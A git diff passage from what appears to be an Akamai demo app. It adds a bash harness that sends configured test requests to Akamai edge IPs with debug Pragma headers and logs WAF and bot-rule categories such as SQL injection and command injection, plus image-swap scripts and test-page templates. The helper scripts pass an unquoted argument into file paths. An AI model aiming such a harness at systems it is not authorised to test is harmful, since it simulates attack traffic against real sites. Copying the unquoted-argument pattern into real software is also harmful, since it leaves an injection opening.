${test_string[2]} =~ ^(POST)?$ ]]; then + if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$H10\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\" --data-raw \"$DATAHOLDER\""; fi + $CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$H10" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" --data-raw "$DATAHOLDER" &> .temp + else + if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\""; fi + $CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" &> .temp + fi + echo "checker" >> .temp + regexhtc='^HTTP\/[0-9]\.[0-9][ ]([[:digit:]]{3})|^curl:.*error: (.*)|^HTTP/2[ ]([[:digit:]]{3})' + regexref='(#|[[:space:]])([[:digit:]]+\.[a-zA-Z0-9]+\.[a-zA-Z0-9]{10,}\.[a-zA-Z0-9]+)' + regexdie='.*doctype.*|^(^$)$' + stopv=0 + http="Timeout" + refe="Unable to get AK_REFERENCE_ID" + while IFS= read -r liner; do + liner="${liner//./.}" + liner="${liner//#/#}" + if [[ $liner =~ $regexhtc ]]; then http="${BASH_REMATCH[1]}${BASH_REMATCH[2]}${BASH_REMATCH[3]}"; http=${http%$'\r'}; http=${http%$' '}; fi + if [[ $liner =~ $regexref ]]; then refe="${BASH_REMATCH[2]}"; fi + if [ $verbose -eq 1 ]; then if ! [[ $liner =~ $regexdie || $stopv -eq 1 ]]; then echo "$liner"; else stopv=1; fi; fi + done < .temp + echo -e "${http}" + # echo -e "${epoch}" + # echo -e "${refe}" + echo -e "" + if [[ ${filetim} != '' ]]; then exportcsv; fi + else + echo -e 'Oops... wrong method!' + exit + fi +} + +property=$3 + +verbose=0 +filetim=""; filecnf=""; fileref="" +PFIPi=""; PEIPi=""; SFIPi=""; SEIPi="" +PFIP="23.54.162.184:23.63.22.131:23.63.22.169:186.177.65.217:186.177.65.208" +PEIP="72.246.84.4:23.40.180.4:23.48.16.4" +SFIP="23.50.49.10:23.50.55.19:23.50.55.25:23.50.51.50:23.50.51.51" +SEIP="23.199.36.2:23.34.4.4:23.59.184.2" +PFFQ="a1.g.akamai.net" +PEFQ="e1.a.akamaiedge.net" +SFFQ="a1.g.akamai-staging.net" +SEFQ="e1.a.akamaiedge-staging.net" +rules=() +headerorder=() +while getopts "c:r:vedm" option; do + case $option in + c) + filecnf=${OPTARG};; + v) + verbose=1 ;; + r) + fileref=${OPTARG};; + e) + filetim=$(date +%s) ;; + d) + PFIP="" + PEIP="" + SFIP="" + SEIP="";; + m) + helpconf + exit;; + esac +done +if (( $OPTIND == 1 )); then + help + exit +fi +if [[ ${filetim} != '' ]]; then + export_type="" + export_payload="" + ACRONYMA=('man' 'atg' 'bms' 'bmp' 'krs-cmd' 'krs-xss' 'krs-dos' 'krs-iht' 'krs-php' 'krs-rfi' 'krs-sql' 'krs-trj' 'aag-wat' 'aag-wpr' 'aag-sql' 'aag-xss' 'aag-lfi' 'aag-rfi' 'aag-cmi' 'aag-wpl' 'penalty' 'aka-arb' 'aka-asc' 'aka-bib' 'aka-eco' 'aka-eag' 'aka-fia' 'aka-fis' 'aka-job' 'aka-mda' 'aka-new' 'aka-onl' 'aka-rss' 'aka-seo' 'aka-sit' 'aka-soc' 'aka-war' 'aka-wse' 'tra-ikb' 'tra-dvf' 'tra-htl' 'tra-wsl' 'tra-osc' 'tra-hbt' 'tra-dcb' 'tra-agc' 'tra-req' 'act-cok') + ACRONYMB=('Manual' 'Attack Group' 'Bot Manager Standard' 'Bot Manager Premier' 'Command Injection' 'Cross-Site Scripting' 'DDOS' 'Invalid HTTP' 'PHP Injection' 'Remote File Inclusion' 'SQL Injection' 'Trojan' 'Web Attack Tool' 'Web Protocol Attack' 'SQL Injection' 'Cross-Site Scripting' 'Local File Inclusion' 'Remote File Inclusion' 'Command Injection' 'Web Platform Attack' 'Penalty Box' 'Academic or Research Bots' 'Automated Shopping Cart and Sniper Bots' 'Business Intelligence Bots' 'E-Commerce Search Engine Bots' 'Enterprise Data Aggregator Bots' 'Financial Account Aggregator Bots' 'Financial Services Bots' 'Job Search Engine Bots' 'Media or Entertainment Search Bots' 'News Aggregator Bots' 'Online Advertising Bots' 'RSS Feed Reader Bots' 'SEO Analytics or Marketing Bots' 'Site Monitoring and Web Development Bots' 'Social Media or Blog Bots' 'Web Archiver Bots' 'Web Search Engine Bots' 'Impersonators of Known Bots' 'Development Frameworks' 'HTTP Libraries' 'Web Services Libraries' 'Open Source Crawlers/Scraping Platforms' 'Headless Browsers/Automation Tools' 'Declared Bots (Keyword Match)' 'Aggressive Web Crawlers' 'Request Anomaly' 'Cookie Integrity Failed' 'Cookie Integrity Failed') + if [ $verbose -eq 1 ]; then echo -e "> exporting $(basename ${filecnf})_${filetim}.csv"; fi + echo "Environment,HTTP Code,Checker reference,Akamai reference,Type,Payload,URL" > "$(basename ${filecnf})_${filetim}.csv" +fi +readconfig $filecnf $property \ No newline at end of file diff --git a/app/flask/scripts/replaceImage.sh b/app/flask/scripts/replaceImage.sh new file mode 100644 index 0000000..04c8352 --- /dev/null +++ b/app/flask/scripts/replaceImage.sh @@ -0,0 +1,15 @@ +#! /bin/bash + +cd /usr/share/nginx/html/learn + +export oldDog=$(cat $1_dog.txt) +echo 'oldDog: '$oldDog +if [ $oldDog = 'cream' ];then +cp golden.png.bak $1_dog.png +echo golden > $1_dog.txt +echo 'newDog: golden' +elif [ $oldDog = 'golden' ];then +cp cream.png.bak $1_dog.png +echo cream > $1_dog.txt +echo 'newDog: cream' +fi; \ No newline at end of file diff --git a/app/flask/scripts/replaceVideo.sh b/app/flask/scripts/replaceVideo.sh new file mode 100644 index 0000000..4e25f69 --- /dev/null +++ b/app/flask/scripts/replaceVideo.sh @@ -0,0 +1,15 @@ +#! /bin/bash + +cd /usr/share/nginx/html/learn + +export oldVideo=$(cat $1_video.txt) +echo 'oldVideo: '$oldVideo +if [ $oldVideo = 'globe' ];then +cp akam.mp4.bak $1_video.mp4 +echo akam > $1_video.txt +echo 'newVideo: akam' +elif [ $oldVideo = 'akam' ];then +cp globe.mp4.bak $1_video.mp4 +echo globe > $1_video.txt +echo 'newVideo: globe' +fi; \ No newline at end of file diff --git a/app/flask/templates/bm.html b/app/flask/templates/bm.html new file mode 100644 index 0000000..b96b896 --- /dev/null +++ b/app/flask/templates/bm.html @@ -0,0 +1,79 @@ + + + + + + Bot Manager Test + + + + + + +
+
+

Bot Manager Test

+
+
+

Click the button to send sample bot traffic to your ${PROPERTY_HOSTNAME}.

+ +

+
+
+

Test result

+
+
+
+
+ +
+
+

  Sending sample bot traffic...

+

  This can take around 1 minute.

+
+
+
+
+
+
+
+
+
+ + + + + \ No newline at end of file diff --git a/app/flask/templates/ivm.html b/app/flask/templates/ivm.html new file mode 100644 index 0000000..6a4b7a4 --- /dev/null +++ b/app/flask/templates/ivm.html @@ -0,0 +1,241 @@ + + + + + + Image & Video Manager Purge + + + + + + + +
+
+

Image & Video Manager Purge Test

+
+
+

Click the button to start. Your images and videos will be shown below.

+ +

+
+
+

NOTE: Please open 'Developer Tools' and check 'Disable Cache' option under 'Network' tab.

+
+
+
+ +
+
+
+
+
+
+
+ +
+ +
+
+
+
Origin Image
+

+
+
+
+
+
+
+ +
+ +
+
+
+
Optimized Image
+

+
+
+
+
+
+
+ +
+ +
+
+
+
Optimized Image with custom query string
+

+
+
+
+
+
+
+
+ +
+ +
+
+
Origin Video
+

+
+
+
+
+
+ +
+ +
+
+
Optimized Video
+

+
+
+
+
+

 

+
+ +
+ + + + + + \ No newline at end of file